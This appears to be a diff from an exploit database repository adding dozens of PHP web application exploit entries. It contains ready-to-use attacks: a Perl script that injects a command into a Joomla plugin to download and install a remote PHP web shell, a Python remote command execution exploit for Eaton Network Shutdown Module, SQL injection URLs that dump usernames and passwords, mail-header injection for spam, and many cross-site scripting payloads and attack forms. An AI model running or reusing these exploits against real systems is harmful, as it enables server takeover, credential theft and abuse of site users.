Attackers may exploit this issue to crash the application or execute arbitrary code with superuser privileges. Successful exploits can result in a complete compromise of vulnerable computers.
Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue.
This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record.
http://www.exploit-db.com/sploits/30096.tar.gz

4
platforms/php/webapps/10419.txt
View file

@ -45,7 +45,7 @@ This exploit will change this info for every user that opens it and is logged in
<input type='hidden' name='showprofile' value='1'>
<input type='hidden' name='avatar' value=''>
<input type='hidden' name='forumtemplate' value='1'>
<textarea name='signature'>Free your mind and the ass will follow.</textarea>
<textarea name='signature'>Free your mind and the ass will follow.&lt;/textarea&gt;
<input type='submit' name='submit' value='change details'>
</form>
@ -66,7 +66,7 @@ Admins must run this exploit.
<input type='text' name='email' value='email@mail.com<mailto:email@mail.com>'>
<input type='text' name='rank' value='0'>
<input type='hidden' name='isbanned' value='No'>
<textarea name='sig'>this is my signature</textarea>
<textarea name='sig'>this is my signature&lt;/textarea&gt;
<input type='submit' name='submit' value='Edit This user'>
</form>

1
platforms/php/webapps/10555.txt
View file

@ -1,4 +1,3 @@
Pentest Information:
====================
GESEC Team (~remove) discover a input validation vulnerability on Barracuda - Web Application Firewall 660 (Appliance).

1
platforms/php/webapps/10621.txt
View file

@ -1,4 +1,3 @@
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .

1
platforms/php/webapps/10726.txt
View file

@ -1,4 +1,3 @@
====================================================================================
[+] Info Fisier 1.0 SQL Injection Vulnerability

2
platforms/php/webapps/10924.txt
View file

@ -18,7 +18,7 @@
1- XSS
http://server/tell_frend.php?name=indoushka&email=indoushka%40hotmaill%2Ecom&name1=tchalla06@yahoo.fr&email1=Hussin-x&submitok=1&link=</textarea><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
http://server/tell_frend.php?name=indoushka&email=indoushka%40hotmaill%2Ecom&name1=tchalla06@yahoo.fr&email1=Hussin-x&submitok=1&link=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
================================ Dz-Ghost Team ========================================

3
platforms/php/webapps/12811.txt
View file

@ -1,5 +1,4 @@
______ _ _ _
| ___ \ | | | | (_)
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __
@ -43,7 +42,7 @@ _____________________________________________________________
<form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;
<input name="submit" type="submit" value=" Save " >
</form>
</html>

9
platforms/php/webapps/30015.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23876/info
Advanced Guestbook is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
Advanced Guestbook 2.4.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/../../../hack_www/htdocs/hack

7
platforms/php/webapps/30022.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/23917/info
PHP Multi User Randomizer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/web/configure_plugin.tpl.php?edit_plugin==[xss]

11
platforms/php/webapps/30027.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23950/info
CommuniGate Pro is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
CommuniGate Pro 5.1.8 and earlier versions are vulnerable to this issue.
Note that this issue is present only when using Microsoft Internet Explorer.
<STYLE>@im\port'\ja\vasc\ript:alert("XSS in message body (style using import)")';</STYLE>

9
platforms/php/webapps/30028.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23951/info
EQDKP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
EQDKP 1.3.2c and prior versions are affected.
http://www.example.com/path-to-eqdkp/listmembers.php?show=%22%3E%3Cplaintext%3E

9
platforms/php/webapps/30029.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23963/info
SonicBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects SonicBB 1.0; other versions may also be affected.
http://www.example.com/search.php?query=1&part=[xss]

136
platforms/php/webapps/30033.txt Executable file
View file

@ -0,0 +1,136 @@
#Title : Joomla com_hotornot2 Remote Code Execution
#Author : DevilScreaM
#Date : 4 Desember 2013
#Category : Web Applications
#Version : 2.0.0
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Remote Code Execution
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
print "======================================================\n";
sleep(1.1);
print "[*] Testing exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_hotornot2/phpThumb/phpThumb.php??src=file.jpg&fltr
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
$cwebsite =
"$target/components/com_hotornot2/phpThumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_hotornot2/phpThumb/phpThumb.php?
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite =
"$target/components/com_hotornot2/phpThumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
==============================================================
Shell Access
http://TARGET/components/com_hotornot2/phpthumb/shell.php

11
platforms/php/webapps/30035.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/23964/info
SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SonicBB 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/
http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23

7
platforms/php/webapps/30036.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/23965/info
The WordPress Akismet plugin is prone to an unspecified vulnerability.
Few technical details are currently available. We will update this BID as more information emerges.
<html> <body> <form action="http://www.example.com/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" type="submit"> </form> </body> </html>

9
platforms/php/webapps/30040.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23989/info
Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input.
Attackers can exploit this issue to send spam email in the context of the application.
Jetbox 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/[JETBOX-DIRECTORY formmail.php?recipient=spam1@somedomain.com&_SETTINGS[allowed_email_hosts][]=somedomain.com&subject=Some Spam Subject%0ABcc: spam_address2@somedomain.com, spam_address2@somedomain.com, spam_address4@somedomain.com, spam_addressN@somedomain.com%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A-- Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide

9
platforms/php/webapps/30041.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23999/info
Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
Jetbox CMS 2.1 is vulnerable.
http://www.example.com/jetbox/index.php/view/search/?path=[xss]

14
platforms/php/webapps/30042.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/23999/info
Jetbox CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
Jetbox CMS 2.1 is vulnerable.
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&require[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=[xss]
http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=1&text=1&title=[xss]

14
platforms/php/webapps/30047.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/24020/info
vBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Note that the attacker must have authenticated access to the affected application.
This issue is reported to affect vBulletin 3.6.6 and prior versions.
http://www.example.com/vbulletin/calendar.php?do=add&type=single&c=1
--> fill up the title field with :
</title><script>alert(document.cookie)</script>

9
platforms/php/webapps/30050.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24037/info
Redoable is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Redoable 1.2 is vulnerable; other versions may also be affected.
<!-- Redoable 1.2 - Cross-Site Scripting Vulnerability --------------- Vulnerable Code --------------- header.php (line 6): ... elseif (is_search()) { ?> Search for <?php echo $s } ... searchloop.php (line 24): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), $s); } ------------ Patched Code ------------ header.php (line 6 FIXED): ... elseif (is_search()) { ?> Search for <?php echo strip_tags($s); } ... searchloop.php (line 24 FIXED): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), strip_tags($s)); } Vulnerable Variable: s Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php Vulnerable: Redoable 1.2 (other versions should also be vulnerable) Google d0rk: "and Redoable 1.2" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a> </font><br><br><br> <center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br> <form action="http://www.example.com/index.php" method="get"> <input size=75 name="s" value="</title><script>alert(1)</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>

9
platforms/php/webapps/30051.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24039/info
PsychoStats is prone to a path-disclosure issue when invalid data is submitted.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer.
PsychoStats 3.0.6b and prior versions are vulnerable to this issue.
http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00

11
platforms/php/webapps/30053.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24061/info
ClientExec is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ClientExec 3.0.0 beta2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?ticketID=[xss]
http://www.example.com/[path]/index.php?view=[xss]
http://www.example.com/[path]/index.php?fuse=[xss]

72
platforms/php/webapps/30057.txt Executable file
View file

@ -0,0 +1,72 @@
----------------------------------------------------------
openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability
----------------------------------------------------------
[-] Software Link:
http://www.opensis.com/
[-] Affected Versions:
All versions from 4.5 to 5.2.
[-] Vulnerability Description:
The vulnerable code is located in the /ajax.php script:
86. if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
87. {
88. if($_REQUEST['_openSIS_PDF']=='true')
89. ob_start();
90. if(strpos($_REQUEST['modname'],'?')!==false)
91. {
92. $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
93. $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
94.
95. $vars = explode('?',$vars);
96. foreach($vars as $code)
97. {
98. $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';");
99. eval($code);
100. }
101. }
User input passed through the "modname" request variable is not properly sanitized before being used in
a call to the eval() function at line 99. This can be exploited to inject and execute arbitrary PHP code.
[-] Solution:
As of December 5th, 2013 the only solution is this patch: http://sourceforge.net/p/opensis-ce/code/1009
[-] Disclosure Timeline:
[04/12/2012] - Issue reported to http://sourceforge.net/p/opensis-ce/bugs/59/
[28/12/2012] - Vendor contacted, replied that the next version will fix the issue
[12/01/2013] - CVE number requested
[14/01/2013] - CVE number assigned
[26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
[12/05/2013] - Vendor contacted again
[15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
[04/12/2013] - After one year still no official solution available
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1349 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-10

71
platforms/php/webapps/30059.py Executable file
View file

@ -0,0 +1,71 @@
#!/usr/bin/env python
#
# Quick 'n' Dirty - Metasploit module didn't do it for me
# 2013 - Filip Waeytens - http://www.wsec.be
#
# Usage Example:
##~ $ python eaton.py 192.168.1.9 "net user"
#
#User accounts for \\
#
#-------------------------------------------------------------------------------
#Guest LocalAdmin
#The command completed with one or more errors.
#
# Exploit Title: Eaton shutdown module php eval exploit
# Date: 5 dec2013
# Exploit Author: Filip Waeytens
# Vendor Homepage: powerquality.eaton.com
# Software Link: http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp
# Version: 3.21
# Tested on: WIN
#References:
###Exploit Database: 23006
###Secunia Advisory ID: 49103
###Bugtraq ID: 54161
###Related OSVDB ID: 83200 83201
###Packet Storm: http://packetstormsecurity.org/files/118420/Network-Shutdown-Module-3.21-Remote-PHP-Code-Injection.html
#
import httplib
import urllib
import sys
import BeautifulSoup
#### First argument is the target IP - port defaults to 4679
targetip = sys.argv[1]
command = sys.argv[2]
targetport=4679
#### if a command has spaces: put between double quotes, the next lines strip the quotes
if command.startswith('"') and string.endswith('"'):
command = command[1:-1]
#### build the urL to request
baserequest = "/view_list.php?paneStatusListSortBy="
wrappedcommand="${@print(system(\""+command+"\"))}"
ue_command = urllib.quote_plus(wrappedcommand)
#### send request
conn = httplib.HTTPConnection(targetip+":"+str(targetport))
conn.request("GET", baserequest+ue_command)
r1 = conn.getresponse()
#print "Getting answer: "
#print r1.status, r1.reason
#print "sent http://"+targetip+":"+str(targetport)+baserequest+ue_command
data1 = r1.read()
#### extract answer
soup = BeautifulSoup.BeautifulSoup(data1)
for p in soup.findAll("p"):
#print dir(p)
#strip first line
result = p.getText().split("Warning")[0]
print result.replace("Multi-source information on the power devices suppying the protected server","",1)

16
platforms/php/webapps/30063.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: WordPress DZS Video Gallery (dzs-videogallery) 3.1.3 Plugins Remote and Local File Disclosure Vulnerability (only .SWF)
# Google Dork: inurl:/wp-content/plugins/dzs-videogallery/
# Vendor Homepage: http://digitalzoomstudio.net/
# Version: ALL
# Affected File: preview.php
# Date: 03/12/2013
# Exploit Author: aceeeeeeeer
# Contact: http://www.twitter.com/aceeeeeeeer
# Tested on: Linux
Exploit:
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=[
SWF LINK ]
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=http://www.cristgaming.com/pirate.swf
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../uploads/2013/12/The_Exorcist.swf

9
platforms/php/webapps/30064.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24063/info
HLstats is prone to mulitiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues may help an attacker steal cookie-based authentication credentials and launch other attacks.
HLstats 1.35 is vulnerable; other versions may also be affected.
http://www.example.com/hlstats/hlstats.php/>"><script>alert(1)</script> http://www.example.com/hlstats/hlstats.php?action=[xss]

41
platforms/php/webapps/30065.html Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/24066/info
GaliX is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
GaliX 2.0 is vulnerable to these issues; other versions may also be affected.
<!--
GaliX? v2.0 - Cross-Site Scripting Exploit
Multiple Vulnerable Variables: galix_cat_detail_sort, galix_cat_detail, galix_gal_detail, galix_cat_detail
Vulnerable: Galix v2.0 (other versions should also be vulnerable)
Google d0rk: "GaliX? v2.0"
John Martinelli
john@martinelli.com
RedLevel Security
RedLevel.org
April 18th, 2007
!-->
<html>
<head><title>GaliX? v2.0 - Cross-Site Scripting Exploit</title><body>
<center><br><br><font size=4>GaliX? v2.0 - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&q=GaliX%C2%B2+v2.0">"GaliX? v2.0"</a></font><br>
<br><br>
<form action="http://www.example.com/path/index.php" method="post">
<input name="galix_action" type="hidden" value="galery">
<input name="galix_cat_detail" size=75 value="<"<<script>alert(1);</script>">
<input name="galix_cat_detail_sort" type="hidden" value="1">
<input name="galix_language_change" type="hidden" value="1">
<input type=submit value="Execute XSS Attack" class="button">
</form>
</body></html>

13
platforms/php/webapps/30066.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/24077/info
Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jetbox 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/path//index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23
http://www.example.com/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1@mail.com%0ABcc: spam_address2@somedomain.com, spam_address2 somedomain.com, spam_address4@somedomain.com, spam_addressNsomedomain.com%0ASubject: Some Spam Subject%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23

9
platforms/php/webapps/30068.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24095/info
Jetbox CMS is prone to a cross-site scripting vulnerability.
This vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Jetbox 2.1 is reported vulnerable; other versions may also be affected.
http://www.example.com/product/index.php?view=webuser&task=sendpw&login=<script>alert(document.cookies)</script>

28
platforms/php/webapps/30070.html Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/24101/info
ClonusWiki is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue is reported to affect ClonusWiki 0.5.
<html>
<head><title>ClonusWiki .5 - Cross-Site Scripting Vulnerability</title><body>
<center><br><br>
<font size=4>ClonusWiki .5 - Cross-Site Scripting Vulnerability</font><br>
<font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a
href="http://redlevel.org">RedLevel Security</a><br><br>
Google d0rk: <a href="http://www.google.com/search?hl=en&q=%22ClonusWiki+.5%22+intitle%3A%22ClonusWiki%22">"ClonusWiki
.5" intitle:"ClonusWiki"</a>
</font><br><br><br>
<center>file <b>index.php</b> - variable <b>query</b> - method <b>get</b></center><br>
<form action="http://clonuswiki.sourceforge.net" method="get">
<input size=75 name="query" value=">"><script>alert(1)</script>">
<input type="hidden" name="action" value="search">
<input type=submit value="Execute XSS Attack" class="button">
</form>
<br>
</body></html>

9
platforms/php/webapps/30071.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24103/info
ABC Excel Parser Pro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ABC Excel Parser Pro 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/sample/xls2mysql/parser_path=shell.txt?

9
platforms/php/webapps/30072.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24106/info
PsychoStats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PsychoStats 3.0.6b is vulnerable; other versions may also be affected.
http://www.example.com/psychostats/weapons.php/>"><script>alert(1)</script>

9
platforms/php/webapps/30073.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24108/info
GMTT Music Distro is prone to a cross-site scripting vulnerability.
This vulnerability potentially allows an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
GMTT Music Distro 1.2 is reported vulnerable; other versions may also be affected.
http://www.example.com/path/showown.php?st=XSS

9
platforms/php/webapps/30075.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24115/info
phpPgAdmin is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
phpPgAdmin 4.1.1 is reported vulnerable; other versions may also be affected.
https://www.example.com/phpPgAdmin/sqledit.php?server=[xss]

9
platforms/php/webapps/30076.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24117/info
WÝYS is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
WÝYS 1.0 is reported vulnerable; other versions may also be affected.
http://www.example.com/index.php?Page=Sayfa&No="><script>alert(document.cookie)</script>

9
platforms/php/webapps/30079.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24122/info
2z Project is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
2z Project 0.9.5 is reported vulnerable; other versions may also be affected.
http://www.example.com/2zcms/?category=none&altname=testnews&rating=xxx

9
platforms/php/webapps/30081.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24135/info
ASP-Nuke is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
ASP-Nuke 2.0.7 is reported vulnerable; other versions may also be affected.
http://www.example.com/news.asp?id="><script>alert("Vagrant")</script>

9
platforms/php/webapps/30082.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24152/info
Gnuturk is prone to a cross-site scripting vulnerability.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Gnuturk 3G is vulnerable to this issue.
http://www.target.com/mods.php?go=News&p=ln&year=2007&month="><h1>Vagrant</h1><script>alert(document.cookie)</script>

51
platforms/php/webapps/30083.txt Executable file
View file

@ -0,0 +1,51 @@
?
BoxBilling 3.6.11 (mod_notification) Stored Cross-Site Scripting Vulnerability
Vendor: BoxBilling
Product web page: http://www.boxbilling.com
Affected version: 3.6.11 (mod_notification 1.0.0)
Summary: BoxBilling is a free billing, invoicing & client management software.
Desc: BoxBilling suffers from a stored cross-site scripting vulnerability.
Input passed to the 'message' POST parameter thru the 'Notification Center'
extension/module is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5163
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php
05.12.2013
--
POST /boxbilling/index.php/api/admin/notification/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: application/json, text/javascript, */*; q=0.01
